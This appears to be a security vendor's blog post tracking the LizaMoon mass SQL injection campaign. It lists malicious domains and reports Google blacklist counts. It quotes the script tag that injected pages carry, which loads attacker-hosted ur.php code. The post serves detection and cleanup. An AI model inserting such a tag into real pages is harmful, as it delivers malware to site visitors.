LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

A couple of months ago the Lizamoon malware / Mass SQL injection was getting a lot of news coverage that it could be affecting hundreds of thousands of sites.

The media mostly forgot about it, but we kept tracking those attacks and they are continuing at full force, but using different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Yes, this site has hosted malicious software over the past 90 days. It infected 1583 domain(s), including chamc.co.kr/, mugunghwa.or.kr/, humour.com/.

While http://statsl.com/ur.php, caused more than 600 sites to get blacklisted and searching on Google for http://asweds.com/ur.php on ASP sites returns more than 2k pages.

Yes, this site has hosted malicious software over the past 90 days. It infected 622 domain(s), including rozanaspokesman.com/, 89fm.com.br/, phhc.co.kr/.

So what is going on? The attacks are still at full force, but using different domains names to distribute the malware (always registered by jamesnorthone@hotmailbox.com). A hacked site will have the following code added to their pages (or very similar):

<script src=http://asweds.com/ur.php>..

These are some of the new domains used in this attack:

http://vcvsta.com/ur.php

http://asweds.com/ur.php

http://statsl.com/ur.php

http://general-st.info/ur.php

http://online-guest.info/ur.php

http://google-stats44.info/ur.php

http://booksolo.com (showing up on hacked sites – seo spam)
http://bookvila.com (showing up on hacked sites – seo spam)
http://booktuba.com (showing up on hacked sites – seo spam)
http://bookavio.com (showing up on these hacked sites – seo spam)
http://booknunu.com (same as above)

And some of the old domains being used on for these mass SQL injections:

http://tadygus.com/ur.php

http://lizamoon.com/ur.php

http://alisa-carter.com/ur.php

http://google-stats50.info/ur.php

http://pop-stats.info/ur.php

http://sol-stats.info/ur.php

http://online-guest.info/ur.php

http://google-stats48.info/ur.php

http://google-stats49.info/ur.php

http://google-stats50.info/ur.php

http://milapop.com/ur.php

http://multi-stats.info/ur.php

http://general-st.info/ur.php

http://worid-of-books.com/ur.php

http://google-server12.info/ur.php

http://stats-master111.info/ur.php

We posted more details on these types of attacks when the first one hit almost a year ago: Mass infection of IIS/ASP sites – robint.us

A good way to check if your site is infected, is by using our malware scanner. If you see IIS:4 as the malware code, you know what happened.


If you have any questions or need help cleaning it up, let us know. If you need immediate clean up assistance, visit our Sign Up page.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.